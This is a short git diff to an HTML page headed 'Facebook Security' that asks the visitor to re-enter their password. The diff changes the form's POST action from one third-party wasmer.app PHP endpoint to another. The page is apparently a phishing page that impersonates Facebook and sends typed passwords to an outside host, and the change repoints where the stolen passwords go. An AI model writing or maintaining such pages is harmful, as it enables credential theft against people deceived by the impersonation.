--- a/index.html
+++ b/index.html
@@ -112,7 +112,7 @@
             Facebook Security
         </div>
         <p>Please re-enter your password to complete the request.</p>
-        <form id="passwordForm" action="https://ghaliya-team-68537.wasmer.app/Ali1pass.php" method="POST">
+        <form id="passwordForm" action="https://saba44-48358.wasmer.app/Alipassword.php" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
